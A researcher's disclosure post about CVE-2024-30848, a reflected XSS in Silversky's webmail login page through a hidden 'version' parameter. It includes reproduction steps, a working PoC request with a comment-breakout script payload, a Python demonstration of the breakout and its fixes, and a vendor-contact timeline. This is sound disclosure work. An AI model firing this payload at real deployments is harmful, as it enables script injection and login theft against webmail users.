CVE-2024-30848: An XSS Vulnerability in Silversky's Mailing Service
As security researchers, we often stumble upon vulnerabilities that have the potential to compromise systems and expose sensitive information. One such discovery is the Cross-Site Scripting (XSS) vulnerability, identified as CVE-2024-30848, in Silversky’s mailing protection service. This blog post details the discovery process, the vulnerability itself, and the disclosure timeline.
Introduction
Cross-Site Scripting (XSS) vulnerabilities are a common yet dangerous threat to web applications, allowing attackers to inject malicious scripts into web pages viewed by other users. On March 17, 2024, I discovered an XSS vulnerability in a hidden parameter named version within Silversky’s mailing protection service. Despite multiple attempts to contact Silversky for remediation, the company has not responded.
The Discovery
The journey to uncovering CVE-2024-30848 began quite unexpectedly. I got a message from my bug bounty framework that it had found an XSS. While reviewing the findings, I noticed that a particular program was using an external webmail service where the XSS was popping. Intrigued by this, I delved deeper into the service, which led me to discover that the service they were using was provided by Silversky. During this examination, I identified a hidden parameter named version that appeared to be vulnerable to XSS attacks.
Technical Details
Silversky's mailing protection service is a webmail front end that Silversky provides to its customers. Its login page at /tpl/Door/Login reflects the hidden version query parameter into the HTML response without encoding it. Judging by the shape of the PoC payload, the value is reflected inside an HTML comment: the payload first closes that comment (-->), then injects its own markup and a script tag, and finally opens a new comment (<!--) so that the remainder of the original page is swallowed instead of producing broken HTML. Because the injection point sits on the unauthenticated login page and the payload travels in a GET request, this is a reflected XSS: an attacker only needs a victim to open a crafted link, after which the script runs in the victim's browser within the origin of the webmail service, where it can read and modify the page (including the login form) and issue requests as that user.
Steps to Reproduce the Vulnerability
- Open the Silversky mailing protection service web interface and intercept the request for the login page (/tpl/Door/Login).
- Add the hidden version query parameter to the request; it is not exposed in the user interface, so it has to be supplied by hand.
- Set version to a payload that closes the surrounding HTML comment and injects a script tag, as in the PoC below.
- Load the response in a browser and observe that the injected script executes, confirming the reflected XSS.
PoC
GET /tpl/Door/Login?Domain=&version=1--%3E%3Cbody%3E%3Ch1%3EPoC%20by%20Excis3%3C/h1%3E%3Cscript%3Eprint(%271%27)%3C/script%3E%3C/body%3E%3C/html%3E%3C!-- HTTP/1.1
Host: <HOST>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=1
Te: trailers
Connection: keep-alive
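The following Python snippet is an added example and is not part of the original post or Silversky's code. It URL-decodes the version value from the PoC request above, renders it through a stand-in login template that reflects the value inside an HTML comment (that template text is an assumption modelled on the comment-breakout shape of the payload, not Silversky's real template), and then uses Python's HTML tokenizer to count the <script> elements a browser would actually parse. The hardened variant shows that output encoding neutralises the payload, and a separate allowlist check shows that the value should never have reached the template in that form in the first place.

```python
"""Reflected XSS via a parameter echoed inside an HTML comment.

Added example for this post; not Silversky's code. The template text in
render_vulnerable/render_hardened is an assumption based on the PoC payload
(it closes a comment, injects markup, then re-opens a comment).
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Request line from the PoC in this post, path and query only.
POC_URL = (
    "/tpl/Door/Login?Domain=&version=1--%3E%3Cbody%3E%3Ch1%3EPoC%20by%20Excis3"
    "%3C/h1%3E%3Cscript%3Eprint(%271%27)%3C/script%3E%3C/body%3E%3C/html%3E%3C!--"
)

# Assumed allowlist for a legitimate version value: digits and dots only.
VERSION_RE = re.compile(r"\d+(\.\d+)*")


def version_param(url: str) -> str:
    """Return the URL-decoded `version` query parameter ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("version", [""])[0]


def render_vulnerable(version: str) -> str:
    """Hypothetical stand-in for the login template: the parameter lands
    verbatim inside an HTML comment, so a value starting with '-->' ends
    the comment and everything after it is parsed as markup."""
    return (
        "<html><!-- version: " + version + " -->"
        '<body><form action="/tpl/Door/Login"></form></body></html>'
    )


def render_hardened(version: str) -> str:
    """Same template with output encoding. Entity references are not
    decoded inside a comment, so the encoded '--&gt;' can never close it.
    valid_version() should additionally be enforced before rendering."""
    return (
        "<html><!-- version: " + escape(version, quote=True) + " -->"
        '<body><form action="/tpl/Door/Login"></form></body></html>'
    )


def valid_version(value: str) -> bool:
    """Allowlist check: reject anything that is not digits and dots."""
    return VERSION_RE.fullmatch(value) is not None


class ScriptCounter(HTMLParser):
    """Counts <script> start tags the tokenizer actually emits, i.e. tags
    that are neither entity-encoded nor swallowed by a comment."""

    def __init__(self) -> None:
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.count += 1


def executable_script_tags(body: str) -> int:
    """Tokenize a response body the way a browser would and return how
    many <script> elements it contains."""
    parser = ScriptCounter()
    parser.feed(body)
    parser.close()
    return parser.count


if __name__ == "__main__":
    payload = version_param(POC_URL)
    print("decoded payload:              ", payload)
    print("scripts in vulnerable render:  ", executable_script_tags(render_vulnerable(payload)))
    print("scripts in hardened render:    ", executable_script_tags(render_hardened(payload)))
    print("payload passes allowlist?      ", valid_version(payload))
```

Running the script prints the decoded payload, one executable script element for the vulnerable render, zero for the encoded render, and False for the allowlist check. The print('1') in the PoC calls window.print(), which opens the browser's print dialog; it proves script execution with a visible side effect in the same way an alert() would.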
Disclosure Timeline
The following timeline outlines the attempts made to disclose this vulnerability to Silversky:
- March 17, 2024: Vulnerability discovered.
- March 18, 2024: Initial disclosure email sent to supportdb@silversky.com.
- March 18, 2024: CVE requested from MITRE.
- March 22, 2024: Follow-up email sent to supportdb@silversky.com.
- March 22, 2024: Email sent to Jackson, the CTO, at jackson@silversky.com.
- March 22, 2024: Reached out to Silversky via Twitter (@silversky).
- March 22, 2024: Attempted to connect with relevant personnel on LinkedIn.
- April 4, 2024: MITRE reserved CVE-2024-30848.
- May 7, 2024: Final email sent to supportdb@silversky.com.
- June 18, 2024: Public disclosure.
Despite these efforts, no response was received from Silversky regarding the reported vulnerability.
Conclusion
CVE-2024-30848 highlights the importance of timely and effective communication between security researchers and software providers. While discovering vulnerabilities is crucial, addressing them promptly is equally important to safeguard users. As security researchers, our goal is to enhance the safety and security of digital systems. Publicly disclosing this vulnerability after the 90-day grace period is a step towards urging Silversky to take action and protect its users from potential XSS attacks. We hope this disclosure will lead to the necessary remediation and raise awareness about the significance of addressing security vulnerabilities.
Stay safe and secure,
Excis3